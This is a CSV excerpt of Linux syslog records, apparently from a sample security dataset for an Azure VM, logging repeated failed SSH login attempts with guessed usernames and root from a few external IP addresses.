+19305,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:11,UbuntuDevEnv,2019-06-26 14:05:11,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19306,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:11,UbuntuDevEnv,2019-06-26 14:05:11,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19307,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:13,UbuntuDevEnv,2019-06-26 14:05:13,auth,UbuntuDevEnv,info,Failed password for invalid user solr from 68.183.50.149 port 44962 ssh2,3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,solr,68.183.50.1,44962,,
+19308,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:13,UbuntuDevEnv,2019-06-26 14:05:13,auth,UbuntuDevEnv,info,Disconnected from invalid user solr 68.183.50.149 port 44962 [preauth],3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,solr,68.183.50.1,44962,,
+19309,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:13,UbuntuDevEnv,2019-06-26 14:05:13,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 44962:11: Bye Bye [preauth],3318,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,44962,,
+19310,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:16,UbuntuDevEnv,2019-06-26 14:05:16,auth,UbuntuDevEnv,info,Connection closed by 180.76.96.9 port 43604 [preauth],3216,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,43604,,
+19311,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:35,UbuntuDevEnv,2019-06-26 14:05:34,auth,UbuntuDevEnv,info,Invalid user view from 180.76.96.9 port 48710,3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,180.76.96.9,48710,,
+19312,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:35,UbuntuDevEnv,2019-06-26 14:05:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19313,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:35,UbuntuDevEnv,2019-06-26 14:05:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19314,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:36,UbuntuDevEnv,2019-06-26 14:05:36,auth,UbuntuDevEnv,info,Failed password for invalid user view from 180.76.96.9 port 48710 ssh2,3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,180.76.96.9,48710,,
+19315,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:36,UbuntuDevEnv,2019-06-26 14:05:36,auth,UbuntuDevEnv,info,Disconnected from invalid user view 180.76.96.9 port 48710 [preauth],3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,view,180.76.96.9,48710,,
+19316,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:05:36,UbuntuDevEnv,2019-06-26 14:05:36,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 48710:11: Bye Bye [preauth],3393,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,48710,,
+19317,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:10,UbuntuDevEnv,2019-06-26 14:09:09,auth,UbuntuDevEnv,info,Invalid user nou from 180.76.96.9 port 45988,4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,180.76.96.9,45988,,
+19318,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:10,UbuntuDevEnv,2019-06-26 14:09:09,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19319,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:10,UbuntuDevEnv,2019-06-26 14:09:09,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19320,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:12,UbuntuDevEnv,2019-06-26 14:09:11,auth,UbuntuDevEnv,info,Failed password for invalid user nou from 180.76.96.9 port 45988 ssh2,4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,180.76.96.9,45988,,
+19321,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:12,UbuntuDevEnv,2019-06-26 14:09:11,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 45988:11: Bye Bye [preauth],4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,45988,,
+19322,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:12,UbuntuDevEnv,2019-06-26 14:09:11,auth,UbuntuDevEnv,info,Disconnected from invalid user nou 180.76.96.9 port 45988 [preauth],4166,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nou,180.76.96.9,45988,,
+19323,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:21,UbuntuDevEnv,2019-06-26 14:09:21,auth,UbuntuDevEnv,info,Invalid user vikas from 196.46.36.144 port 33534,4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vikas,196.46.36.1,33534,,
+19324,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:21,UbuntuDevEnv,2019-06-26 14:09:21,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19325,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:21,UbuntuDevEnv,2019-06-26 14:09:21,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19326,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:23,UbuntuDevEnv,2019-06-26 14:09:23,auth,UbuntuDevEnv,info,Failed password for invalid user vikas from 196.46.36.144 port 33534 ssh2,4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vikas,196.46.36.1,33534,,
+19327,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:23,UbuntuDevEnv,2019-06-26 14:09:23,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 33534:11: Bye Bye [preauth],4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,33534,,
+19328,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:23,UbuntuDevEnv,2019-06-26 14:09:23,auth,UbuntuDevEnv,info,Disconnected from invalid user vikas 196.46.36.144 port 33534 [preauth],4204,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,vikas,196.46.36.1,33534,,
+19329,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:36,UbuntuDevEnv,2019-06-26 14:09:36,auth,UbuntuDevEnv,info,Invalid user newrelic from 68.183.50.149 port 39350,4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,newrelic,68.183.50.1,39350,,
+19330,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:36,UbuntuDevEnv,2019-06-26 14:09:36,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19331,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:36,UbuntuDevEnv,2019-06-26 14:09:36,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19332,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:39,UbuntuDevEnv,2019-06-26 14:09:38,auth,UbuntuDevEnv,info,Failed password for invalid user newrelic from 68.183.50.149 port 39350 ssh2,4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,newrelic,68.183.50.1,39350,,
+19333,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:39,UbuntuDevEnv,2019-06-26 14:09:38,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 39350:11: Bye Bye [preauth],4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,39350,,
+19334,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:09:39,UbuntuDevEnv,2019-06-26 14:09:38,auth,UbuntuDevEnv,info,Disconnected from invalid user newrelic 68.183.50.149 port 39350 [preauth],4260,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,newrelic,68.183.50.1,39350,,
+19335,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:59,UbuntuDevEnv,2019-06-26 14:11:58,auth,UbuntuDevEnv,info,Invalid user anne from 180.76.96.9 port 38156,4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,180.76.96.9,38156,,
+19336,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:59,UbuntuDevEnv,2019-06-26 14:11:58,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19337,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:11:59,UbuntuDevEnv,2019-06-26 14:11:58,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9,4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,180.76.96.9,,0,
+19338,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:00,UbuntuDevEnv,2019-06-26 14:12:00,auth,UbuntuDevEnv,info,Failed password for invalid user anne from 180.76.96.9 port 38156 ssh2,4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,180.76.96.9,38156,,
+19339,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:00,UbuntuDevEnv,2019-06-26 14:12:00,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 38156:11: Bye Bye [preauth],4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,38156,,
+19340,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:00,UbuntuDevEnv,2019-06-26 14:12:00,auth,UbuntuDevEnv,info,Disconnected from invalid user anne 180.76.96.9 port 38156 [preauth],4767,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,anne,180.76.96.9,38156,,
+19341,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:07,UbuntuDevEnv,2019-06-26 14:12:06,auth,UbuntuDevEnv,info,Invalid user ts3 from 196.46.36.144 port 41706,4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,196.46.36.1,41706,,
+19342,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:07,UbuntuDevEnv,2019-06-26 14:12:06,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19343,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:07,UbuntuDevEnv,2019-06-26 14:12:06,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=196.46.36.144,4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,196.46.36.1,,0,
+19344,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:08,UbuntuDevEnv,2019-06-26 14:12:07,auth,UbuntuDevEnv,info,Failed password for invalid user ts3 from 196.46.36.144 port 41706 ssh2,4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,196.46.36.1,41706,,
+19345,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:08,UbuntuDevEnv,2019-06-26 14:12:08,auth,UbuntuDevEnv,info,Received disconnect from 196.46.36.144 port 41706:11: Bye Bye [preauth],4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,196.46.36.1,41706,,
+19346,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:08,UbuntuDevEnv,2019-06-26 14:12:08,auth,UbuntuDevEnv,info,Disconnected from invalid user ts3 196.46.36.144 port 41706 [preauth],4797,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,ts3,196.46.36.1,41706,,
+19347,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:35,UbuntuDevEnv,2019-06-26 14:12:34,auth,UbuntuDevEnv,info,Invalid user nas from 68.183.50.149 port 45036,4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nas,68.183.50.1,45036,,
+19348,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:35,UbuntuDevEnv,2019-06-26 14:12:34,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19349,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:35,UbuntuDevEnv,2019-06-26 14:12:34,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19350,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:37,UbuntuDevEnv,2019-06-26 14:12:36,auth,UbuntuDevEnv,info,Failed password for invalid user nas from 68.183.50.149 port 45036 ssh2,4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nas,68.183.50.1,45036,,
+19351,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:37,UbuntuDevEnv,2019-06-26 14:12:36,auth,UbuntuDevEnv,info,Received disconnect from 68.183.50.149 port 45036:11: Bye Bye [preauth],4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,68.183.50.1,45036,,
+19352,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:37,UbuntuDevEnv,2019-06-26 14:12:36,auth,UbuntuDevEnv,info,Disconnected from invalid user nas 68.183.50.149 port 45036 [preauth],4906,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,nas,68.183.50.1,45036,,
+19353,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:44,UbuntuDevEnv,2019-06-26 14:12:43,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9  user=root,4934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,180.76.96.9,,0,
+19354,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:46,UbuntuDevEnv,2019-06-26 14:12:45,auth,UbuntuDevEnv,info,Failed password for root from 180.76.96.9 port 43272 ssh2,4934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,43272,,
+19355,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:46,UbuntuDevEnv,2019-06-26 14:12:46,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 43272:11: Bye Bye [preauth],4934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,43272,,
+19356,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:12:46,UbuntuDevEnv,2019-06-26 14:12:46,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 180.76.96.9 port 43272 [preauth],4934,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,180.76.96.9,43272,,
+19357,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:13:28,UbuntuDevEnv,2019-06-26 14:13:27,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=180.76.96.9  user=root,5101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,root,180.76.96.9,,0,
+19358,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:13:30,UbuntuDevEnv,2019-06-26 14:13:29,auth,UbuntuDevEnv,info,Failed password for root from 180.76.96.9 port 48380 ssh2,5101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,48380,,
+19359,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:13:32,UbuntuDevEnv,2019-06-26 14:13:31,auth,UbuntuDevEnv,info,Disconnected from authenticating user root 180.76.96.9 port 48380 [preauth],5101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,root,180.76.96.9,48380,,
+19360,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:13:32,UbuntuDevEnv,2019-06-26 14:13:31,auth,UbuntuDevEnv,info,Received disconnect from 180.76.96.9 port 48380:11: Bye Bye [preauth],5101,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,,180.76.96.9,48380,,
+19361,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:03,UbuntuDevEnv,2019-06-26 14:14:02,auth,UbuntuDevEnv,info,Invalid user display from 68.183.50.149 port 33754,5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,display,68.183.50.1,33754,,
+19362,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:03,UbuntuDevEnv,2019-06-26 14:14:02,authpriv,UbuntuDevEnv,notice,pam_unix(sshd:auth): authentication failure  logname= uid=0 euid=0 tty=ssh ruser= rhost=68.183.50.149,5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,,68.183.50.1,,0,
+19363,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:03,UbuntuDevEnv,2019-06-26 14:14:02,authpriv,UbuntuDevEnv,warn,pam_unix(sshd:auth): check pass  user unknown,5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Unknown,unknown,,,,
+19364,b1315f05-4a7a-45b4-811f-73e715f7c122,Linux,2019-06-26 14:14:04,UbuntuDevEnv,2019-06-26 14:14:04,auth,UbuntuDevEnv,info,Failed password for invalid user display from 68.183.50.149 port 33754 ssh2,5225,10.0.1.4,sshd,00000000-0000-0000-0000-000000000002,Syslog,/subscriptions/3b701f84-d04b-4479-89b1-fa8827eb537e/resourcegroups/contoso/providers/microsoft.compute/virtualmachines/ubuntudevenv,Failure,display,68.183.50.1,33754,,
